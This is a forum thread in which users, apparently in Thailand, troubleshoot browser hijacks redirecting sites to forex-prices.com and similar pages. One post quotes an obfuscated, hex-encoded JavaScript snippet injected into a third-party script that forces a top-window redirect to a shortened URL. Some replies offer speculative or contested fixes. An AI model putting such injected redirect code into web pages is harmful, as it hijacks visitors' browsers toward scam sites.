Jump to content

force redirect to "forex-prices.com" Spyware/Virus?


Recommended Posts

Posted

This is getting very frustrating. This site keeps raping my deviantART page, or anywhere I go on dA. What makes it worse is I'm using Xubuntu. Google doesn't return any results. It doesn't happen on Windows either. Just on Firefox, on Xubuntu. (I might try Chrome to see what happens though) I've had a similar issue like this in the past with parking.ps, and a google search led me to this page, which seemed to indicate that TRUE or some Thai ISP was ******* up everyone's Internet. I already cleared the cache, as well as used a proxy and rebooted, and I use Google's DNS servers, but simply cannot go to deviantART. What I really want to know right now is, does this problem seem to occur with anyone else? If not, I might start making posts on some Linux Forums as well. This just doesn't seem normal for this to be happening on Xubuntu. Or at least it's never happened to me before.

  • Like 1
Posted

I'm getting this as well. Same thing that happened with the parking.ps problem a couple of weeks ago.

Seriously frustrating.

Used Malwarebytes, flushed DNS, emptied cache, browsing history, temporary internet files etc. - nothing seems to work.

Unlike others, this happens in IE10. I've tried running the browser without add-ons but it makes no difference.

Chrome is seemingly immune although I know a lot of people had the parking.ps issue using Chrome last time.

Any help?

Posted

Yeah started to get this also today. Have been in Thailand for a few days only. Seems to happen only in Firefox (running version 24.0), not in Chrome so far. Only happens on a few of my frequently browsed news sites (bbc, Telegraph), but the list is growing seemingly. Perhaps its updating a list of redirects somewhere?

Using a MacBook Air. OSX 10.6.8

Very odd, annoying and running Kaspersky now and will do malwarebytes and everything afterwards. Will post back if I find out anymore info.

Posted

I may have fixed the problem, or I'm hoping. I tried closing all of my dA tabs, and then clearing the cache, and then going to my proxy(which is in the US, and tunneled with SSH, adding encryption to it) I did try that the first time, but it didn't seem to quite work. I think it all has to be done in a certain order, and maybe with no tabs open. I'm guessing, or hoping this is a problem that can fix itself. But either way it's frustrating. I'm glad I'm not the only one with this problem. At least I know I don't have something wrong with my computer, or browser. I appreciate the feedback.

Posted (edited)

Will try clearing the cache etc...but surely this only fixes the symptom and not the illness, which if like parking.ps, will include all sorts of potential malware files already installed as part of this problem?

Update: Clearing the cache worked. ****But again is this the only problem from this malware?

Edited by Big G
Posted (edited)

It isn't malware, this was all dealt with on the parking.ps thread (assuming the source is the same as the parking.ps redirects)

There is nothing installed on your computer, except a cached page perhaps.

it is an ad opening, but the ad runs a script that redirects your browser rather than opening a pop-up. It derives from the ISP not your machine, so don't upload fake programs that claim to remove this non-existent malware, because these WILL upload malware to your PC.

Edited by partington
Posted

I am Thai and have been living in Thailand for all my years. I've experience this as well and this is the only thread I found out that people also have this problem. It all happened yesterday for me.

Clearing cache works but only for a few hours. It will happen again later. I've been using several tools to cure my PC but nothing seems to work.

My ISP is True. Reading parington's post, does this means that it is True problem that cause these redirecting?
f so, is there anything we can do? I will give them a call and will report to you what is going on on that end.

Posted (edited)

I am Thai and have been living in Thailand for all my years. I've experience this as well and this is the only thread I found out that people also have this problem. It all happened yesterday for me.

Clearing cache works but only for a few hours. It will happen again later. I've been using several tools to cure my PC but nothing seems to work.

My ISP is True. Reading parington's post, does this means that it is True problem that cause these redirecting?

f so, is there anything we can do? I will give them a call and will report to you what is going on on that end.

The thread is worth looking at here,http://www.thaivisa.com/forum/topic/665817-anyone-know-about-parkingps-virus/

( but only the last page or so - people were still mistakingly calling it a virus in the first page)

The post I quote below from this thread (post #80)seems to be the one that explains what is happening best. It seems like clearing your cache and then installing or enabling the AdBlock extension will prevent this redirect, because it will prevent the ad opening, which causes your browser to redirect. For me the problem went away after I did this, but it could just be a coincidence and True actually did something to deal with it....

I haven't yet had the Forex redirect happen to me.

There's a javascript file being loaded that is being modified by a 3rd party somehow.

The file name is quant.js. It's loading from: http://edge.quantserve.com/quant.js

The offending code looks like:

//<![CDATA[

if(!fxpr) { var fxpr = 1; function __x(zz) { var _0xede9=["\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x34\x51\x52\x33\x48\x32\x27\x3B", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72]; setTimeout(_0xede9[0],Math[_0xede9[2]]((Math[_0xede9[1]]()*76543)+zz)); } function vl1() { top.location = 'http://goo.gl/QBwtIl'; } __x(1234); }

//]]>

The hex part is redirecting to http://goo.gl/4QR3H2' which is parking.ps.

If u try to open edge.quantserve.com/quant.js and get this code, hit ctrl+r it will reload and download a original file, clearing cache should also help.

Since it is not happening on all sites, I think it's coming from some broken ad server or quantserve.com dns got poisoned somehow and changed to some malicious IP which had the modified version of quant.js. So it was redirecting when u visit sites that used quant.js from this server.

Edited by partington
Posted (edited)

Thank you, Partington

I always have adBlock enable. So I don't really know what the cause is. It might be the same problem with javascript though. I will look into it. Thank you.

Ps. I've contacted True and they said that I'm the first one that contacted them regarding this question. They don't know what causing this problem and they are looking into this problem whether it is the ISP fault or not. They will contact me in the next 24 hours. I will update you guys later.

Edited by KennyKwan
Posted

Spoke too soon - just got this redirect despite Adblock. Was a redirect, instantly, when I tried to go to the UK Guardian Newspaper site. Unlike the previous parking .ps problem there was no delay - I just couldn't get onto the website at all, was hijacked instantly!

Posted

Spoke too soon - just got this redirect despite Adblock. Was a redirect, instantly, when I tried to go to the UK Guardian Newspaper site. Unlike the previous parking .ps problem there was no delay - I just couldn't get onto the website at all, was hijacked instantly!

To forex-prices? I usually be able to load some chunk of the website (eg. pictures, logo) before redirected to forex-prices

Posted

Spoke too soon - just got this redirect despite Adblock. Was a redirect, instantly, when I tried to go to the UK Guardian Newspaper site. Unlike the previous parking .ps problem there was no delay - I just couldn't get onto the website at all, was hijacked instantly!

To forex-prices? I usually be able to load some chunk of the website (eg. pictures, logo) before redirected to forex-prices

Yes, that means you are infected too. It doesn't redirect immediately since the script needed to be invoked first which depending on order of each websites. Adblock can't help anything since this script looks valid in Adblock's eyes.

Posted

Is a java hack im pretty certain on that. Narrows it down when a Mac has been involved as windows garbage could be one of 200 things :) Remove java do other fixes that have worked reboot fresh java install should fix it. In theory that is hahahah

Posted

Is a java hack im pretty certain on that. Narrows it down when a Mac has been involved as windows garbage could be one of 200 things smile.png Remove java do other fixes that have worked reboot fresh java install should fix it. In theory that is hahahah

This isn't the case since the redirect also happens to iOS devices which do not run java. Like mentioned above, it's poisoned javascript that is injected somewhere down the line. It is, for the most part, out of our hands when it comes to fixing this problem. You can turn off javascript in your browser, but that comes with its own drawbacks and isn't a real solution.

Posted

Understood but apart from the plugins for the browsers even on macs will find java 7 installed also. I no sweet f all on java but a wild guess maybe that's what's generating the code that's getting injected. Would be straight clone on a windows box as its java code not win or iOS etc etc

Posted

I guess we gotta wait and see if anything else was installed? Kaspersky scanning didn't show anything, but if there is other malware, it might be too new for Kaspersky to know about.

Of course, I have no backups of my Mac(yeah, I know) although I have all the files I need copied and safe. So aside from doing a restore, which I don't have and further investigation, will wait and see what we all turn up?

Thread so far has been invaluable - thx.

Posted

I guess we gotta wait and see if anything else was installed? Kaspersky scanning didn't show anything, but if there is other malware, it might be too new for Kaspersky to know about.

Of course, I have no backups of my Mac(yeah, I know) although I have all the files I need copied and safe. So aside from doing a restore, which I don't have and further investigation, will wait and see what we all turn up?

Thread so far has been invaluable - thx.

Please don't keep saying or thinking that something has "been installed", or calling it "infected".

No virus or malware program will spot this because what is happening is that an ad on the page you are browsing is opening. The ad is opening another URL which sends a java script which your browser runs, and force opens a new page.

This is not something on your equipment that has been installed. it is your browser opening an ad which is sending a signal telling your browser to go somewhere else. I do not understand where this bad code gets into the system, but it is sent from a server . It is not on your PC, Mac or phone, and it happens on ALL these different OS.

It is now happening on my android. The site it redirects to has changed to "cheap car-insurrance.com'". The fact that insurance is spelt wrong in the URL tells you this is some scam, URL poisoning operation.

It's getting very annoying. Of course turning javascript off stops it, but this stops sites working including any viewing of flash video. Reloading java is just a dopey waste of time, as the script will be sent from whereever is sending it whether you do that or not.

I phoned True, but I don't even know if they can do anything - I changed from True DNS to open DNS, but it's still happening, so it may not be sourced from the True DNS server.

If there's someone who really knows what' the reason is likely to be, rather than just a guess, hope you'll post !

Posted

If you can find the URL which opens the server that sends the redirect javascript, wouldn't it be possible to set up AdBlock to block that URL opening? You can add specific URLs and URL patterns to Adblock and tell it to block them.

Then Adblock wouldn't need to recognise the URL because you've told it not to open the ad which is causing the problem?

Someone who knows more than me maybe able to tell me what URL to block from this (my activity window when Safari goes from Daily Mail website article to this redirect (no cracks about Daily Mail I know it's crap, but this is just a site that is doing the redirect consistently today):

http://goo.gl/voNi7T is the address for the car-insurrance web page, but entering it into Adblock doesn't stop it.

post-26070-0-77190200-1380182710_thumb.j

Posted (edited)

I found a fix for this, at least it works on my system which is Windows 7 x64 SP1 running on an i& Toshiba laptop. I had the same thing (forex-prices.com) and then it switched to some other url (cheap-car-rentals) or something like that. I found this web page and follwed all the instructions...

http://malwaretips.com/blogs/remove-browser-redirect-virus/

During the running of RogueKill I found several DNS reg key problems and this looks like where the source is (maybe not). When I tried to delete the DNS registry key entries with RogueKill I got access denied errors so I went into my registry (regedit.exe) and removed the reg keys manually. I rebooted and now it all seems to be gone after opening 50 tabs and several browser sessions with no issues.

In my case I deleted only the keys RogueKill highlighted which were in

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces{reg key number here}
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces{reg key number here}
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces{reg key number here}

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces{reg key number here}
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces{reg key number here}
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces{reg key number here}

So far it seems to have worked. No more redirects whereas before it was almost all pages I tried to access which would load partially and then redirect. Maybe this will work for others here.

Edited by bobshaw
Posted

I found a fix for this, at least it works on my system which is Windows 7 x64 SP1 running on an i& Toshiba laptop. I had the same thing (forex-prices.com) and then it switched to some other url (cheap-car-rentals) or something like that. I found this web page and follwed all the instructions...

http://malwaretips.com/blogs/remove-browser-redirect-virus/

During the running of RogueKill I found several DNS reg key problems and this looks like where the source is (maybe not). When I tried to delete the DNS registry key entries with RogueKill I got access denied errors so I went into my registry (regedit.exe) and removed the reg keys manually (close RogueKill first). I rebooted and now it all seems to be gone after opening 50 tabs and several browser sessions with no issues.

So far it seems to have worked. No more redirects whereas before it was almost all pages I tried to access which would load partially and then redirect. Maybe this will work for others here.

I think you'll find that you may have just installed more spyware on your computer.

The link you provided just gets you to download mickey mouse software. Of course, Malwarebytes and Kaspersky are very well known anti-malware/spyware programs but they're just put there to lull you into a false sense of security. After all, those names are trustworthy so the other programs like Rkill and Hitmanpro will be trustworthy too, right??

Wrong

Of course, I could be very wrong myself but as some have said, this problem might not be on your machine

Posted

Windows users could try the following.

Download (not install or run yet) http://www.bleepingcomputer.com/download/adwcleaner/

Download and install http://www.piriform.com/ccleaner/download (keep this on your computer anyway)

Download and install http://www.safer-networking.org/

Download and install http://www.malwarebytes.org/

(Obviously don't download and install any of these if you already have them)

Make sure they are all up to date by opening them up and using the tools in each package.

Print or copy and paste this page somewhere you can read it offline.

Disconnect from the internet, close all browsers and any browser based tools (i.e. most e-mail clients like Thunderbird and Outlook)

Run A/V, Malwarebytes, Spybot S&D and CCleaner.

Once these are run you should finally use ADWCleaner and follow the instructions.

All this done and the forced reboot (ADWCleaner) performed it is time to change your DNS settings

https://store.opendns.com/setup/computer/

This is for OpenDNS but you can also use the googleDNS at

8.8.8.8

8.8.4.4

This done you can go back online again.

I realise that this is very long winded but it will sort out around 99% of issues you'll have with the internet and potentially this one (unless it is sitting on one of the TRUE nodes).

Posted (edited)

Windows users could try the following.

Download (not install or run yet) http://www.bleepingcomputer.com/download/adwcleaner/

Download and install http://www.piriform.com/ccleaner/download (keep this on your computer anyway)

Download and install http://www.safer-networking.org/

Download and install http://www.malwarebytes.org/

(Obviously don't download and install any of these if you already have them)

Make sure they are all up to date by opening them up and using the tools in each package.

Print or copy and paste this page somewhere you can read it offline.

Disconnect from the internet, close all browsers and any browser based tools (i.e. most e-mail clients like Thunderbird and Outlook)

Run A/V, Malwarebytes, Spybot S&D and CCleaner.

Once these are run you should finally use ADWCleaner and follow the instructions.

All this done and the forced reboot (ADWCleaner) performed it is time to change your DNS settings

https://store.opendns.com/setup/computer/

This is for OpenDNS but you can also use the googleDNS at

8.8.8.8

8.8.4.4

This done you can go back online again.

I realise that this is very long winded but it will sort out around 99% of issues you'll have with the internet and potentially this one (unless it is sitting on one of the TRUE nodes).

This won't do anything. You are not reading the thread detailing what the problem is caused by, so you are not giving helpful advice.

It happens on Macs, Windows, Iphones and Android phones.

For the last time: it's a javascript instruction, that is sent freshly each time a particular advertisement tries to open on a webpage.

Edited by partington
Posted (edited)

Any solution that proposes cleaning your computer is mostly in vain. At best it'll delete a cached version of the poison script. That might provide temporary relief until you encounter the bad javascript again.

I'm far from an expert, but from looking at a few sites that both redirect me I've come to the conclusion that the following javascript could be the culprit.

http://b.scorecardresearch.com/beacon.js

I added the following filter to Adblock Plus (other ad blocking extensions might use a different syntax) and haven't had seen a redirect since. It could just be a fluke, but it is simpler and less involved than anything else proposed.

||scorecardresearch.com^

I'd love for people to post some more sites they've visited so I can do a little more amateur sleuthing to confirm or bust my results. Or send it via PM to avoid cluttering up this thread.

Edited by Scarecrow
  • Like 1
Posted

So who has this problem and doesn't have True as an ISP ?

I have exactly the same problem as of yesterday, first noticed visiting the bbc.co.uk I've done all and more than suggested above. The only solution so far (which is no solution at all), is to disable javascript.

Total waste of time anyone messing about with a multitude of AV and AM programs or blaming OS / browser version. It is consistent across the most commonly used browsers and operating systems. The website it happens on I don't believe to relevant either, other than it is a one you visit a lot. I don't believe Yahoo and the BBC are unwittingly hijacking peoples browsers via their ad platform.

By firing up a VPN the BBC works as it should with no redirect to forex - prices .com or cheap - car- insurrance .com. That is with a UK IP address however.

Using another VPN IP address in Thailand other than True's (Servenet Solution Limited Partnership) the problem is back. Perhaps servenets upstream provider is True.

Pretty sure this is ISP related. As far as I can tell the problem is specific to at least two ISP's in Thailand. As soon as Thailand is out of the equation the problem doesn't exist. Please can someone with a machine exhibiting a problem try using a VPN ?

Posted

Any solution that proposes cleaning your computer is mostly in vain. At best it'll delete a cached version of the poison script. That might provide temporary relief until you encounter the bad javascript again.

I'm far from an expert, but from looking at a few sites that both redirect me I've come to the conclusion that the following javascript could be the culprit.

http://b.scorecardresearch.com/beacon.js

I added the following filter to Adblock Plus (other ad blocking extensions might use a different syntax) and haven't had seen a redirect since. It could just be a fluke, but it is simpler and less involved than anything else proposed.

||scorecardresearch.com^

I'd love for people to post some more sites they've visited so I can do a little more amateur sleuthing to confirm or bust my results. Or send it via PM to avoid cluttering up this thread.

I get it on Bloomberg.com, CNBC.com, telegraph.co.uk

Posted

Windows users could try the following.

Download (not install or run yet) http://www.bleepingcomputer.com/download/adwcleaner/

Download and install http://www.piriform.com/ccleaner/download (keep this on your computer anyway)

Download and install http://www.safer-networking.org/

Download and install http://www.malwarebytes.org/

(Obviously don't download and install any of these if you already have them)

Make sure they are all up to date by opening them up and using the tools in each package.

Print or copy and paste this page somewhere you can read it offline.

Disconnect from the internet, close all browsers and any browser based tools (i.e. most e-mail clients like Thunderbird and Outlook)

Run A/V, Malwarebytes, Spybot S&D and CCleaner.

Once these are run you should finally use ADWCleaner and follow the instructions.

All this done and the forced reboot (ADWCleaner) performed it is time to change your DNS settings

https://store.opendns.com/setup/computer/

This is for OpenDNS but you can also use the googleDNS at

8.8.8.8

8.8.4.4

This done you can go back online again.

I realise that this is very long winded but it will sort out around 99% of issues you'll have with the internet and potentially this one (unless it is sitting on one of the TRUE nodes).

This won't do anything. You are not reading the thread detailing what the problem is caused by, so you are not giving helpful advice.

It happens on Macs, Windows, Iphones and Android phones.

For the last time: it's a javascript instruction, that is sent freshly each time a particular advertisement tries to open on a webpage.

Specifically: a piece of Javascript that will only execute when visiting legitimate sites sites when True is your ISP. Take True out of the picture and as far as I can tell the problem cannot be replicated.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.



×
×
  • Create New...